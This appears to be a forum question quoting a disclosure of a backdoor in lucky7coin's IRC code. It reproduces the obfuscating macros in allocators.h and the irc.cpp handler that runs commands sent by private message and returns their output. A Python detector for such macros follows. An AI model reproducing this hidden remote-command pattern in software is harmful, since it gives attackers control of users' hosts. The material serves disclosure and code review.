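The code below reportedly leaves a backdoor for hackers who use this program. It is source code from the open-source lucky7coin project on GitHub.
Can anyone who understands it explain how this backdoor would be exploited: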
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host. In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

    /** Determine system page size in bytes */
    #define S_ORDER(a,b,c,d) b##a##d##c
    /**
     * OS-dependent memory page locking/unlocking.
     * Defined as policy class to make stubbing for test possible.
     */
    #define CLine S_ORDER(I,F,E,L)
    /**
     * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
     * std::allocator templates.
     */
    #define CRead S_ORDER(p,po,n,e)
    #define CFree S_ORDER(cl,p,e,os)
    //
    // Allocator that locks its contents from being paged
    // out of memory and clears its contents before deletion.
    //
    #define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

I expect this is a known issue since this kind of thing doesn't happen accidentally.
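Added example, not part of the quoted report or the lucky7coin code: a small Python review aid that expands simple `##` token-pasting macros and split string literals, as used in the src/allocators.h excerpt above, and flags macros that resolve to process-spawning calls. The `SUSPICIOUS` watch list and the function names are assumptions chosen for illustration; the sample input is the macro lines quoted above.

```python
import re

# Constructed sample: the macro lines quoted above from src/allocators.h.
SAMPLE = '''
#define S_ORDER(a,b,c,d) b##a##d##c
#define CLine S_ORDER(I,F,E,L)
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
'''
# Assumed watch list of process-spawning calls; extend it for your code base.
SUSPICIOUS = {"popen", "pclose", "system", "execl", "execlp", "execv", "execvp"}

FUNC_DEF = re.compile(r'^\s*#\s*define\s+(\w+)\(([^)]*)\)\s+(.+?)\s*$')
OBJ_DEF = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.+?)\s*$')
CALL = re.compile(r'^(\w+)\(([^()]*)\)$')
SPLIT_STRING = re.compile(r'^"[^"]*"(?:\s*"[^"]*")+$')

def expand_macros(source):
    """Resolve macros built from a token-paste helper or from split string literals."""
    funcs, objs = {}, {}
    for line in source.splitlines():
        m = FUNC_DEF.match(line)
        if m:
            funcs[m.group(1)] = ([p.strip() for p in m.group(2).split(",")], m.group(3))
            continue
        m = OBJ_DEF.match(line)
        if m:
            objs[m.group(1)] = m.group(2)
    resolved = {}
    for name, body in objs.items():
        call = CALL.match(body)
        if call and call.group(1) in funcs:
            params, template = funcs[call.group(1)]
            args = [a.strip() for a in call.group(2).split(",")]
            if "##" in template and len(args) == len(params):
                binding = dict(zip(params, args))
                # '##' pastes tokens: substitute each parameter, then join the pieces.
                parts = [t.strip() for t in template.split("##")]
                resolved[name] = "".join(binding.get(p, p) for p in parts)
        elif SPLIT_STRING.match(body):
            # Adjacent string literals are concatenated by the compiler.
            resolved[name] = "".join(re.findall(r'"([^"]*)"', body))
    return resolved

def flag_hidden_calls(source):
    """Return {macro: real_name} for macros that paste together a watched call name."""
    return {k: v for k, v in expand_macros(source).items() if v in SUSPICIOUS}

print(flag_hidden_calls(SAMPLE))
```

This only handles one level of macro indirection; for anything deeper, review the compiler's preprocessed output (`-E`) instead of the raw source.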